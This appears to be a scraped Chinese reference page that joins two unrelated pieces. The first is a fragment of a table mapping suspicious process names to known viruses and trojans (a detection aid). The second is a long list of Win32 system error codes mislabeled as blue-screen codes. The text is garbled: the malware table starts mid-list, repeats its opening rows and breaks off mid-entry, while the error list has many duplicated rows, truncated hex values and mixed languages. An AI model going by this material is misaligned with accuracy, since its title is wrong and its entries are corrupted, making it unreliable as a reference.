Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat 

Server 1. 2.exe → Spirit 2000 1.2fixed Sy***plr.exe → 冰河 

Intel.exe → 传奇叛逆 Syshelp.exe → 恶邮差病毒 

Internet.exe → 传奇幽灵 Sysprot.exe → Satans Back Door 

Internet.exe → 网络神偷 Sysrunt.exe → Ripper 

Kernel16.exe → Transmission Scount System.exe → s**tHeap 

Kernel32.exe → 坏透了或冰河 System32.exe → DeepThroat 1.0 

Kiss.exe → 传奇天使 Systray.exe → DeepThroat 2.0-3.1 

Krn132.exe → 求职信病毒 Syswindow.exe → Trojan Cow 

Libupdate.exe → BioNet Task_Bar.exe → WebEx 

Load.exe → 尼姆达病毒 Taskbar → 密码病毒 Frethem 

Lockdown2000.exe → 将死者病毒 Taskmon.exe → 诺维格蠕虫病毒 

Taskmon32 → 传奇黑眼睛 Tds2-98.exe → 将死者病毒 

Tds2-Nt.exe → 将死者病毒 Temp $01.exe → Snid 

Tempinetb00st.exe → The Unexplained Tempserver.exe → Delta Source 

Vshwin32.exe → 将死者病毒 Vsstart.exe → 将死者病毒 

Vw32.exe → 将死者病毒 Windown.exe → Spirit 2000 1.2 

Windows.exe → 黑洞2000 Winfunctions.exe → Dark Shadow 

Wingate.exe → 恶邮差病毒 Wink????.exe → 求职信病毒 

Winl0g0n.exe → 笑哈哈病毒 Winmgm32.exe → 巨无霸病毒 

Winmsg32.exe → Xtcp Winprot.exe → Chupachbra 

Winprotecte.exe → Stealth Winrpc.exe → 恶邮差病毒 

Winrpcsrv.exe → 恶邮差病毒 Winserv.exe → Softwarst 

Wubsys.exe → 传奇猎手 Winupdate.exe → Sckiss爱情森林 

Winver.exe → Sckiss爱情森林 Winvnc.exe → 恶邮差病毒 

Winzip.exe → ShadowPhyre Wqk.exe → 求职信病毒 常见病毒、木马进程速查表

exe → BF Evolution Mbbmanager.exe → 聪明基因 

_.exe → Tryit Mdm.exe → Doly 1.6-1.7 

Aboutagirl.exe → 初恋情人 Microsoft.exe → 传奇密码使者 

Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆达病毒 

Aplica32.exe → 将死者病毒 Mprdll.exe → Bla 

Avconsol.exe → 将死者病毒 Msabel32.exe → Cain and Abel 

Avp.exe → 将死者病毒 Msblast.exe → 冲击波病毒 

Avp32.exe → 将死者病毒 Mschv.exe → Control 

Avpcc.exe → 将死者病毒 Msgsrv36.exe → Coma 

Avpm.exe → 将死者病毒 Msgsvc.exe → 火凤凰 

Avserve.exe → 震荡波病毒 Msgsvr16.exe → Acid Shiver 

Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson 

Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup 

Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5 

Cfiaudit.exe → 将死者病毒 Netip.exe → Spirit 2000 Beta 

Cfinet32.exe → 将死者病毒 Netspy.exe → 网络精灵 

Checkdll.exe → 网络公牛 Notpa.exe → Backdoor 

Cmctl32.exe → Back Construction Odbc.exe → Telecommando 

Command.exe → AOL Trojan Pcfwallicon.exe → 将死者病毒 

Diagcfg.exe → 广外女生 Pcx.exe → Xplorer 

Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒 

Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap 

Dvldr32.exe → 口令病毒 Regscan.exe → 波特后门变种 

Esafe.exe → 将死者病毒 Tftp.exe → 尼姆达病毒 

Expiorer.exe → Acid Battery Thing.exe → Thing 

Feweb.exe → 将死者病毒 User.exe → Schwindler 

Flcss.exe → Funlove病毒 Vp32.exe → 将死者病毒 

Frw.exe → 将死者病毒 Vpcc.exe → 将死者病毒 

Icload95.exe → 将死者病毒 Vpm.exe → 将死者病毒 

Icloadnt.exe → 将死者病毒 Vsecomr.exe → 将死者病毒 

Icmon.exe → 将死者病毒 Server.exe → Revenger, WinCrash, YAT 

Icsupp95.exe → 将死者病毒 Service.exe → Trinoo 

Iexplore.exe → 恶邮差病毒 Setup.exe → 密码病毒或Xanadu 

Rpcsrv.exe → 恶邮差病毒 Sockets.exe → Vampire 

Rundll.exe → SCKISS爱情森林 Something.exe → BladeRunner 

Rundll32.exe→ 狩猎者病毒 Spfw.exe → 瑞波变种PX 

Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) → 蓝色代码 

Scanrew.exe → 传奇终结者 Sysedit32.exe → SCKISS爱情森林 

Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat 

Server 1. 2.exe → Spirit 2000 1.2fixed Sy***plr.exe → 冰河 

Intel.exe → 传奇叛逆 Syshelp.exe → 恶邮差病毒 

Internet.exe → 

WINDOWS的蓝屏代码信息

WINDOWS的蓝屏代码信息  
 

-------------------------------------------------------------------------------- 
  
0 0x0000 作业完成。 
1 0x0001 不正确的函数。 
2 0x0002 系统找不到指定的档案。 
3 0x0003 系统找不到指定的路径。 
4 0x0004 系统无法开启档案。 
5 0x0005 拒绝存取。 
6 0x0006 无效的代码。 
7 0x0007 储存体控制区块已毁。 
8 0x0008 储存体空间不足,无法处理这个指令。 
9 0x0009 储存体控制区块地址无效。 
10 0x000A 环境不正确。 
11 0x000B 尝试加载一个格式错误的程序。 
12 0x000C 存取码错误。 
13 0x000D 资料错误。 
14 0x000E 储存体空间不够,无法完成这项作业。 
15 0x000F 系统找不到指定的磁盘驱动器。 
16 0x0010 无法移除目录。 
16 0x0010 无法移除目录。 
17 0x0011 系统无法将档案移到 其它的磁盘驱动器。 
18 0x0012 没有任何档案。 
19 0x0013 储存媒体为写保护状态。 
20 0x0014 系统找不到指定的装置。 
21 0x0015 装置尚未就绪。 
22 0x0016 装置无法识别指令。 
23 0x0017 资料错误 (cyclic redundancy check) 
24 0x0018 程序发出一个长度错误的指令。 
25 0x0019 磁盘驱动器在磁盘找不到 持定的扇区或磁道。 
26 0x001A 指定的磁盘或磁盘无法存取。 
27 0x001B 磁盘驱动器找不到要求的扇区。 
28 0x001C 打印机没有纸。 
29 0x001D 系统无法将资料写入指定的磁盘驱动器。 
30 0x001E 系统无法读取指定的装置。 
31 0x001F 连接到系统的某个装置没有作用。 
32 0x0020 The process cannot access the file because it is being used by another process. 
33 0x0021 档案的一部份被锁定, 现在无法存取。 
34 0x0022 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial Number: %3) 插入磁盘机%1。 
36 0x0024 开启的分享档案数量太多。 
38 0x0026 到达档案结尾。 
39 0x0027 磁盘已满。 
50 0x0032 不支持这种网络要求。 
51 0x0033 远程计算机无法使用。 
52 0x0034 网络名称重复。 
53 0x0035 网络路径找不到。 
54 0x0036 网络忙碌中。 
55 0x0037 The specified network resource or device is no longer available. 
56 0x0038 The network BIOS command limit has been reached. 57 0x0039 网络配接卡发生问题。 
58 0x003A 指定的服务器无法执行要求的作业。 
59 0x003B 网络发生意外错误。 
60 0x003C 远程配接卡不兼容。 
61 0x003D 打印机队列已满。 
62 0x003E 服务器的空间无法储存等候打印的档案。 
63 0x003F 等候打印的档案已经删除。 
64 0x0040 指定的网络名称无法使用。 
65 0x0041 拒绝存取网络。 
65 0x0041 拒绝存取网络。 
66 0x0042 网络资源类型错误。 
67 0x0043 网络名称找不到。 
68 0x0044 超过区域计算机网络配接卡的名称限制。 
69 0x0045 超过网络 BIOS 作业阶段的限制。 
70 0x0046 远程服务器已经暂停或者正在起始中。 
71 0x0047 由于联机数目已达上限,此时无法再联机到这台远程计算机。 
72 0x0048 指定的打印机或磁盘装置已经暂停作用。 
80 0x0050 档案已经存在。 
82 0x0052 无法建立目录或档案。 
83 0x0053 INT 24 失败 
84 0x0054 处理这项要求的储存体无法使用。 
85 0x0055 近端装置名称已经在使用中。 
86 0x0056 指定的网络密码错误。 
87 0x0057 参数错误。 
88 0x0058 网络发生资料写入错误。 
89 0x0059 此时系统无法执行其它行程。 
100 0x0064 无法建立其它的系统 semaphore。 101 0x0065 属于其它行程专用的 semaphore. 
102 0x0066 semaphore 已经设定,而且无法关闭。 
103 0x0067 无法指定 semaphore 。 
104 0x0068 在岔断时间无法要求专用的 semaphore 。 
104 0x0068 在岔断时间无法要求专用的 semaphore 。 
105 0x0069 此 semaphore 先前的拥有权已经结束。 
106 0x006A 请将磁盘插入 %1。 
107 0x006B 因为代用的磁盘尚未插入,所以程序已经停止。 
108 0x006C 磁盘正在使用中或被锁定。 
109 0x006D Pipe 已经中止。 
110 0x006E 系统无法开启指定的 装置或档案。 
111 0x006F 档名太长。 
112 0x0070 磁盘空间不足。 
113 0x0071 没有可用的内部档案标识符。 
114 0x0072 目标内部档案标识符不正确。 
117 0x0075 由应用程序所执行的 IOCTL 呼叫 不正确。 
118 0x0076 写入验证参数值不正确。 
119 0x0077 系统不支持所要求的指令。 
120 0x0078 此项功能仅在 Win32 模式有效。 
121 0x0079 semaphore 超过逾时期间。 
122 0x007A 传到系统呼叫的资料区域 太小。 
123 0x007B 文件名、目录名称或储存体卷标语法错误。 
124 0x007C 系统呼叫层次不正确。 
125 0x007D 磁盘没有设定卷标。 
126 0x007E 找不到指定的模块。 
127 0x007F 找不到指定的程序。 
128 0x0080 没有子行程可供等待。 
128 0x0080 没有子行程可供等待。 
129 0x0081 %1 这个应用程序无法在 Win32 模式下执行。 
130 0x0082 Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O. 
131 0x0083 尝试将档案指针移至档案开头之前。 
132 0x0084 无法在指定的装置或档案,设定档案指针。 
133 0x0085 JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动器。 
134 0x0086 尝试在已经结合的磁盘驱动器,使用 JOIN 或 SUBST 指令。 
135 0x0087 尝试在已经替换的磁盘驱动器,使 用 JOIN 或 SUBST 指令。 
136 0x0088 系统尝试删除 未连结过的磁盘驱动器的连结关系。 
137 0x0089 系统尝试删除 未替换过的磁盘驱动器的替换关系。 
138 0x008A 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目录。 
139 0x008B 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。 
140 0x008C 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。 
141 0x00 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。 
142 0x008E 系统此刻无法执行 JOIN 或 SUBST。 
143 0x008F 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。 
144 0x0090 这个目录不是根目录的子目录。 
145 0x0091 目录仍有资料。 
146 0x0092 指定的路径已经被替换过。 
147 0x0093 资源不足,无法处理这项 指令。 
148 0x0094 指定的路径这时候无法使用。 
148 0x0094 指定的路径这时候无法使用。 
149 0x0095 尝试要结合或替换的磁盘驱动器目录,是已经替换过的的目标。 
150 0x0096 CONFIG.SYS 文件未指定系统追踪信息,或是追踪功能被取消。 
151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。 
152 0x0098 DosMuxSemWait 没有执行;设定太多的 semaphore。 
153 0x0099 DosMuxSemWait 清单不正确。 
154 0x009A 您所输入的储存媒体标 元长度限制。 
155 0x009B 无法建立其它的执行绪。 
156 0x009C 接收行程拒绝接受信号。 
157 0x009D 区段已经被舍弃,无法被锁定。 
158 0x009E 区段已经解除锁定。 
159 0x009F 执行绪识别码的地址不正确。 
160 0x00A0 传到 DosExecPgm 的自变量字符串不正确。 
161 0x00A1 指定的路径不正确。 
162 0x00A2 信号等候处理。 
164 0x00A4 系统无法建立执行绪。 
167 0x00A7 无法锁定档案的部份范围。 
170 0x00AA 所要求的资源正在使用中。 
173 0x00AD 取消范围的锁定要求不明显。 
174 0x00AE 档案系统不支持自动变更锁定类型。 
180 0x00B4 系统发现不正确的区段号码。 
182 0x00B6 操作系统无法执行 %1。 
182 0x00B6 操作系统无法执行 %1。 
183 0x00B7 档案已存在,无法建立同一档案。 
186 0x00BA 传送的旗号错误。 
187 0x00BB 指定的系统旗号找不到。 
188 0x00BC 操作系统无法执行 %1。 
189 0x00BD 操作系统无法执行 %1。 
190 0x00BE 操作系统无法执行 %1。 
191 0x00BF 无法在 Win32 模式下执行 %1。 
192 0x00C0 操作系统无法执行 %1。 
193 0x00C1  
201 0x00C9 操作系统无法执行 %1。 
202 0x00CA 操作系统无法执行 %1。 
203 0x00CB 系统找不到输入的环境选项。\r 
205 0x00CD 在指令子目录下,没有任何行程有信号副处理程序。 
206 0x00CE 文件名称或扩展名太长。 
207 0x00CF ring 2 堆栈使用中。 
207 0x00CF ring 2 堆栈使用中。 
208 0x00D0 输入的通用档名字元 * 或 ? 不正确, 或指定太多的通用檔名字元。 
209 0x00D1 所传送的信号不正确。 
210 0x00D2 无法设定信号处理程序。 
212 0x00D4 区段被锁定,而且无法重新配置。 
214 0x00D6 附加到此程序或动态连结模块的动态连结模块太多。 
215 0x00D7 Can’t nest calls to LoadModule. 
230 0x00E6 The pipe state is invalid. 
231 0x00E7 所有的 pipe instances 都在忙碌中。 
232 0x00E8 The pipe is being closed. 
233 0x00E9 No process is on the other end of the pipe. 
234 0x00EA 有更多可用的资料。 
240 0x00F0 作业阶段被取消。 
254 0x00FE 指定的延伸属性名称无效。 
255 0x00FF 延伸的属性不一致。 
259 0x0103 没有可用的资料。 
266 0x010A 无法使用 Copy API。 
267 0x010B 目录名称错误。 
275 0x0113 延伸属性不适用于缓冲区。 
276 0x0114 在外挂的档案系统上的延伸属性档案已经毁损。 
277 0x0115 延伸属性表格文件满。 
278 0x0116 指定的延伸属性代码无效。 
278 0x0116 指定的延伸属性代码无效。 
282 0x011A 外挂的这个档案系统不支持延伸属性。 
288 0x0120 意图释放不属于叫用者的 mutex。 
298 0x012A semaphore 传送次数过多。 
299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。 
317 0x013D 系统找不到位于讯息文件 %2 中编号为 0x%1 的讯息。 
487 0x01E7 尝试存取无效的地址。 
534 0x0216 运算结果超过 32 位。 
535 0x0217 信道的另一端有一个行程在接送资料。 
536 0x0218 等候行程来开启信道的另一端。 
994 0x03E2 存取延伸的属性被拒。 
995 0x03E3 由于执行绪结束或应用程序要求,而异常终止 I/O 作业。 
996 0x03E4 重叠的 I/O 事件不是设定成通知状态。 
997 0x03E5 正在处理重叠的 I/O 作业。 
998 0x03E6 对内存位置的无效存取。 
999 0x03E7 执行 inpage 作业发生错误。 
1001 0x03E9 递归太深,堆栈满溢。 
1002 0x03EA 窗口无法用来传送讯息。 
1003 0x03EB 无法完成这项功能。 
1004 0x03EC 旗号无效。 
1005 0x03ED 储存媒体未含任何可辨识的档案系统。 请确定以加载所需的系统驱动程序,而且该储存媒体并未毁损。 
1006 0x03EE 储存该档案的外部媒体发出警告,表示该已开启档案已经无效。 
1007 0x03EF 所要求的作业无法在全屏幕模式下执行。 
1008 0x03F0 An attempt was made to reference a token that does not exist. 
1009 0x03F1 组态系统登录数据库毁损。 
1010 0x03F2 组态系统登录机码无效。 
1011 0x03F3 无法开启组态系统登录机码。 
1012 0x03F4 无法读取组态系统登录机码。 
1013 0x03F5 无法写入组态系统登录机码。 
1014 0x03F6 系统登录数据库中的一个档案必须使用记录或其它备份还原。 已经还原成功。 
1015 0x03F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映对内存内容毁损、会是档案无法复原。 
1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、写出或更新,其中的一个档案 内含系统登录在内存中的内容。 
1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中, 但是,指定档案的格式不是系统登录文件的格式。 
1018 0x03FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 
1018 0x03FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 
1019 0x03FB 系统无法配置系统登录记录所需的空间。 
1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。 
1021 0x03FD 无法在临时机码下建立永久的子机码。 
1022 0x03FE 变更要求的通知完成,但信息 并未透过呼叫者的缓冲区传回。呼叫者现在需要自行列举档案,找出变更的地方。 
1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。 
1052 0x041C 要求的控制对此服务无效 
1053 0x041D The service did not respond to the start or control request in a timely fashion. 1054 0x041E 无法建立服务的执行绪。 
1055 0x041F 服务数据库被锁定。 
1056 0x0420 这种服务已经在执行。 
1057 0x0421 帐户名称错误或者不存在。 
1058 0x0422 指定的服务暂停作用,无法激活。 
1059 0x0423 指定循环服务从属关系。 
1060 0x0424 指定的服务不是安装进来的服务。 
1061 0x0425 该服务项目此时无法接收控制讯息。 
1062 0x0426 服务尚未激活。 
1063 0x0427 无法联机到服务控制程序。 
1064 0x0428 处理控制要求时,发生意外状况。 
1065 0x0429 指定的数据库不存在。 
1065 0x0429 指定的数据库不存在。 
1066 0x042A 服务传回专属于服务的错误码。 
1067 0x042B The process terminated unexpectedly. 
1068 0x042C 从属服务或群组无法激活。 
1069 0x042D 因为登入失败,所以没有激活服务。 
1070 0x042E 在激活之后,服务在激活状态时当机。 
1071 0x042F 指定服务数据库锁定无效。 
1072 0x0430 指定的服务已经标示为删除。 
1073 0x0431 指定的服务已经存在。 
1074 0x0432 系统目前正以上一次执行成功的组态执行。 
1075 0x0433 从属服务不存在,或已经标示为删除。 
1076 0x0434 目前的激活已经接受上一次执行成功的 控制设定。 
1077 0x0435 上一次激活之后,就没有再激活服务。 
1078 0x0436 指定的名称已经用于服务名称或服务显示 名称。 
1100 0x044C 已经到了磁带的最后。 
1101 0x044D 到了档案标示。 
1102 0x044E 遇到磁带的开头或分割区。 
1103 0x044F 到了档案组的结尾。 
1104 0x0450 磁带没有任何资料。 
1105 0x0451 磁带无法制作分割区。 
1106 0x0452 存取多重容体的新磁带时,发现目前 区块大小错误。 
1107 0x0453 加载磁带时,找不到磁带分割区信息。 
1108 0x0454 无法锁住储存媒体退带功能。 
1108 0x0454 无法锁住储存媒体退带功能。 
1109 0x0455 无法解除加载储存媒体。 
1110 0x0456 磁盘驱动器中的储存媒体已经变更。 
1111 0x0457 已经重设 I/O 总线。 
1112 0x0458 磁盘驱动器没有任何储存媒体。 
1113 0x0459 目标 multi-byte code page,没有对应 Unicode 字符。 
1114 0x045A 动态链接库 (DLL) 起始例程失败。 
1115 0x045B 系统正在关机。 
1116 0x045C 无法中止系统关机,因为没有关机的动作在进行中。 
1117 0x045D 因为 I/O 装置发生错误,所以无法执行要求。 
1118 0x045E 序列装置起始失败,会取消加载序列驱动程序。 
1119 0x045F 无法开启装置。这个装置与其它装置共享岔断要求 (IRQ)。 至少已经有一个使用同一IRQ 的其它装置已经开启。 
1120 0x0460 A serial I/O operation was completed by another write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.) 
1121 0x0461 因为已经过了逾时时间,所以序列 I/O 作业完成。(IOCTL_SERIAL_XOFF_COUNTER 不是零。) 
1122 0x0462 在磁盘找不到任何的 ID 地址标示。 
1123 0x0463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。 
1124 0x0464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。 
1125 0x0465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。 
1126 0x0466 存取硬盘失败,重试后也无法作业。 
1127 0x0467 存取硬盘失败,重试后也无法作业。 
1128 0x0468 存取硬盘时,必须重设磁盘控制卡,但是 连重设的动作也失败。 
1129 0x0469 到了磁带的最后。 
1130 0x046A 可用服务器储存空间不足,无法处理这项指令。 
1131 0x046B 发现潜在的死锁条件。 
1132 0x046C 指定的基本地址或档案位移没有适当 对齐。 
1140 0x0474 尝试变更系统电源状态,但其它的应用程序或驱动程序拒绝。 
1141 0x0475 系统 BIOS 无法变更系统电源状态。 
1150 0x047E 指定的程序需要新的 Windows 版本。 
1151 0x047F 指定的程序不是 Windows 或 MS-DOS 程序。 
1152 0x0480 指定的程序已经激活,无法再激活一次。 
1153 0x0481 指定的程序是为旧版的 Windows 所写的。 
1154 0x0482 执行此应用程序所需的链接库档案之一毁损。 
1155 0x0483 没有应用程序与此项作业的指定档案建立关联。 
1156 0x0484 传送指令到应用程序发生错误。 
1157 0x0485 找不到执行此应用程序所需的链接库档案。 
1200 0x04B0 指定的装置名称无效。 
1201 0x04B1 装置现在虽然未联机,但是它是一个记忆联机。 
1202 0x04B2 尝试记忆已经记住的装置。 
1203 0x04B3 提供的网络路径找不到任何网络提供程序。 
1203 0x04B3 提供的网络路径找不到任何网络提供程序。 
1204 0x04B4 指定的网络提供程序名称错误。 
1205 0x04B5 无法开启网络联机设定文件。 
1206 0x04B6 网络联机设定文件坏掉。 
1207 0x04B7 无法列举非容器。 
1208 0x04B8 发生延伸的错误。 
1209 0x04B9 指定的群组名称错误。 
1210 0x04BA 指定的计算机名称错误。 
1211 0x04BB 指定的事件名称错误。 
1212 0x04BC 指定的网络名称错误。
1401 0x0579 菜单识别码无效。 
1402 0x057A 光标句柄无效。 
1403 0x057B 加速键表格句柄无效。 
1403 0x057B 加速键表格句柄无效。 
1404 0x057C Invalid hook handle. 1405 0x057D 无效的多重窗口位置结构控制。 
1406 0x057E 无法建立最上层的子窗口。 
1407 0x057F 找不到 window class。 
1408 0x0580 无效的窗口,属于其它的执行绪。 
1409 0x0581 快速键已经登记。 
1410 0x0582 Class 已经存在。 
1411 0x0583 Class 不存在。 
1412 0x0584 Class 仍然有开启的窗口。 
1413 0x0585 无效的索引。 
1414 0x0586 图标句柄无效。 
1415 0x0587 使用专用的 DIALOG 窗口文字。 
1416 0x0588 清单方块识别码找不到。 
1417 0x0589 找不到任何通配字符。 
1418 0x058A 执行绪 (thread) 没有开启剪贴簿。 
1419 0x058B 快速键没有登记。 
1420 0x058C 不是有效的对话窗口。 
1421 0x05 Control ID 找不到。 
1422 0x058E 清单方块的讯息无效,因为没有任何的编辑句柄。 
1423 0x058F 窗口不是一个清单方块。 
1424 0x0590 高度必须小于 256。 
1425 0x0591 装置范围 (DC) 句柄无效。 
1425 0x0591 装置范围 (DC) 句柄无效。 
1426 0x0592 锁定程序类型无效。 
1427 0x0593 锁定程序无效。 
1428 0x0594 没有模块句柄就不能设定非本区的锁定。 
1429 0x0595 This hook procedure can only be set globally. 
1430 0x0596 The journal hook procedure is already installed. 
1431 0x0597 The hook procedure is not installed. 
1432 0x0598 无效的单一选择清单方块讯息。 
1433 0x0599 LB_SETCOUNT 传送到 non-lazy 清单方块。 
1434 0x059A 这个清单方块不支持跳格停驻。 
1435 0x059B 不可毁损由其它执行绪所建立的对象。 
1436 0x059C 子窗口不能有菜单。 
1437 0x059D 窗口没有系统菜单。 
1438 0x059E 无效的消息框样式。 
1439 0x059F 无效的 sys tem-wide (SPI_*) 参数。 
1440 0x05A0 屏幕已经锁定。 
1441 0x05A1 All handles to windows in a multiple-window position structure must have the same parent. 
1442 0x05A2 窗口不是子窗口。 
1443 0x05A3 GW_* 指令无效。 
1444 0x05A4 执行绪识别码无效。 
1445 0x05A5 无法处理多重文件接口窗口的讯息。 
1445 0x05A5 无法处理多重文件接口窗口的讯息。 
1446 0x05A6 即现式菜单已在作用中。 
1447 0x05A7 窗口没有滚动条。 
1448 0x05A8 滚动条范围不可以大于 0x7FFF。 1449 0x05A9 无法以指定的方式显示或移除窗口。 
1450 0x05AA 系统资源不足,无法完成所要求的服务。 
1451 0x05AB 系统资源不足,无法完成所要求的服务。 
1452 0x05AC 系统资源不足,无法完成所要求的服务。 
1453 0x05AD 配额不足,无法完成所要求的服务。 
1454 0x05AE 配额不足,无法完成所要求的服务。 
1455 0x05AF 这项作业的 paging 文件太小,无法完成作业。 
1456 0x05B0 找不到菜单项目。 
1500 0x05DC 事件记录文件坏掉。 
1501 0x05DD 无法开启事件记录文件,因此事件记录服务没有激活。 
1502 0x05DE 事件记录文件已满。 
1503 0x05DF 事件记录文件已经变更。 
1700 0x06A4 字符串连结错误。 
1701 0x06A5 连结句柄 (binding handle) 的类型错误。 
1702 0x06A6 连结句柄 (binding handle) 无效。 
1703 0x06A7 不支持 RPC 通讯协议顺序。 
1704 0x06A8 RPC 通讯协议顺序无效。 
1705 0x06A9 字符串 universal unique identifier (UUID) 无效。 
1705 0x06A9 字符串 universal unique identifier (UUID) 无效。 
1706 0x06AA 端点格式错误。 
1707 0x06AB 网络地址无效。 
1708 0x06AC 找不到端点。 
1709 0x06AD 逾时数值无效。 
1710 0x06AE 找不到对象的 universal unique identifier (UUID)。 
1711 0x06AF 对象的 universal unique identifier (UUID) 已经登记。 
1712 0x06B0 类型的 universal unique identifier (UUID) 已经登记。 
1713 0x06B1 RPC 服务器已经在听候。 
1714 0x06B2 没有登记通讯协议顺序。 
1715 0x06B3 RPC 服务器没有听候指令。 
1716 0x06B4 管理员类型不详。 
1717 0x06B5 接口不详。 
1718 0x06B6 没有联机。 
1719 0x06B7 没有通讯协议顺序。 
1720 0x06B8 无法建立端点。 
1721 0x06B9 资源不足,无法完成作业。 
1722 0x06BA RPC 服务器无法使用。 
1723 0x06BB RPC 服务器太忙,无法完成这项作业。 
1724 0x06BC 网络选项无效。 
1725 0x06BD 这个执行绪 (thread) 没有任何执行的远程过程调用。 
1726 0x06BE 远程过程调用失败。 
1727 0x06BF 远程过程调用失败,所以没有执行。 
1727 0x06BF 远程过程调用失败,所以没有执行。 
1728 0x06C0 远程过程调用 (remote procedure call,RPC) 通讯协议发生错误。 
1730 0x06C2 RPC 服务器不支持转送语法。 
1732 0x06C4 不支持 universal unique identifier (UUID) 的类型。 
 1733 0x06C5 封签 (tag) 无效。 
1734 0x06C6 数组无效。 
1735 0x06C7 连结中没有项目名称。 
1736 0x06C8 名称语法无效。 
1737 0x06C9 名称语法不被支持。 
1739 0x06CB 没有任何网络地址可以用来建立全球唯一的识别码 (UUID)。 
1740 0x06CC 端点重复。 
1741 0x06CD 授权类型不详。 
1742 0x06CE 呼叫次数的上限太小。 
1743 0x06CF 字符串太长。 
1744 0x06D0 找不到 RPC 通讯协议顺序。 
1745 0x06D1 程序号码超出范围。 
1746 0x06D2 连结中没有包含任何确认信息。 
1747 0x06D3 确认服务不详。 
1748 0x06D4 确认层次不详。 
1749 0x06D5 安全内容无效。 
1750 0x06D6 确认服务不详。 
1751 0x06D7 项目无效。 
1751 0x06D7 项目无效。 
1752 0x06D8 服务器端点无法执行这个作业。 
1753 0x06D9 端点对应程序没有其它的端点。 
1754 0x06DA 没有汇出任何的接口。 
1755 0x06DB 项目名称不完整。 
1756 0x06DC 版本选项无效。 
1757 0x06DD 没有其它的成员。 
1758 0x06DE 没有任何资料可以取消汇出。 
1759 0x06DF 接口找不到。 
1760 0x06E0 项目已经存在。 
1761 0x06E1 项目找不到。 
1762 0x06E2 名称服务无法使用。 
1763 0x06E3 网络地址系列无效。 
1764 0x06E4 要求的作业不受支持。 
1765 0x06E5 没有可用来仿真的安全内容。 
1766 0x06E6 远程过程调用 (RPC) 发生内部错误。 
1767 0x06E7 RPC 服务器尝试用整数除以 0。 
1768 0x06E8 RPC 服务器发生地址设定错误。 
1769 0x06E9 RPC 服务器的浮点作业导致除以 0 的运算。 
1770 0x06EA RPC 服务器发生浮点 underflow。 
1771 0x06EB RPC 服务器发生浮点 overflow。 
1772 0x06EC 清单中可供连结自动代码 的 RPC 服务器已经用完。 
1773 0x06ED 无法开启字符转换表档案。 
1773 0x06ED 无法开启字符转换表档案。 
1774 0x06EE 包含字符转换表的档案少于 512 字节。 
1775 0x06EF 在远程过程调用时,将空的 context 代码从 客户端传送到主计算机。 
1777 0x06F1 在远程过程调用时内容处理改变。 
1778 0x06F2 传送给远程过程调用的连结代码不符。 
1779 0x06F3 The stub is unable to get the remote procedure call handle. 
1780 0x06F4 A null reference pointer was passed to the stub. 
1781 0x06F5 The enumeration valuesss is out of range. 
1782 0x06F6 字节计数太小。 
1783 0x06F7 The stub received bad data. 
1784 0x06F8 所提供的使用者缓冲区对要求的作业无效。 
1785 0x06F9 无法辨识磁盘储存媒体。磁盘储存媒体可能还没有制作格式。 
1786 0x06FA The workstation does not have a trust secret. 
1787 0x06FB The SAM database on the Windows NT Server does not have a computer account for this workstation trust relationship. 
1788 0x06FC The trust relationship between the primary domain and the trusted domain failed. 
1789 0x06FD The trust relationship between this workstation and theprimary domain failed. 
1790 0x06FE 网络登入失败。 
1790 0x06FE 网络登入失败。 
1791 0x06FF 远程过程调用已经在这个执行绪进行中。 
1792 0x0700 尝试登入,但网络登入服务尚未激活。 
1793 0x0701 使用者的帐户已经过期。 
1794 0x0702 The redirector is in use and cannot be unloaded. 
1795 0x0703 指定的打印机驱动程序已经安装。 
1796 0x0704 指定的连接埠无法识别。 
1797 0x0705 打印机驱动程序无法识别。 
1798 0x0706 打印处理器不详。 
1799 0x0707 指定的分隔档无效。 
1800 0x0708 指定的优先级无效。 
1801 0x0709 打印机名称无效。 
1802 0x070A 打印机已经存在。 
1803 0x070B 打印机指令无效。 
1804 0x070C 指定的数据类型无效。 
1805 0x070D 指定的 Environment 无效。 
1806 0x070E 没有其它的连结。 
1807 0x070F 这是一个跨网域的信任帐户。请用您的全域性使用者帐户或区域性使用者帐户来存取服务器。 
1808 0x0710 这是一个计算机帐户。请使用您的全域性使用者帐户或区域性使用者帐户来存取这个服务器。 
1809 0x0711 这是一个伺服端信任帐户。请用您的全域性使用者帐户或区域性使用者帐户来存取服务器。
1810 0x0712 指定的网域名称或安全识别码与网域信用信息 不符。 
1811 0x0713 服务器正在使用中,无法卸载。 
1812 0x0714 指定的影像档案没有有包含资源区段。 
1813 0x0715 在影像文件找不到指定的资源类型。 
1814 0x0716 在影像文件找不到指定的资源名称。 
1815 0x0717 在影像文件找不到指定的资源语系识别码。 
1816 0x0718 可用的配额不足,无法处理这项指令。 
1817 0x0719 登录任何接口。 
1818 0x071A 处理这项呼叫的时候,服务器发生变更。 
1819 0x071B 连结代码没有包含所有必须的信息。 
1820 0x071C 通讯失败。 
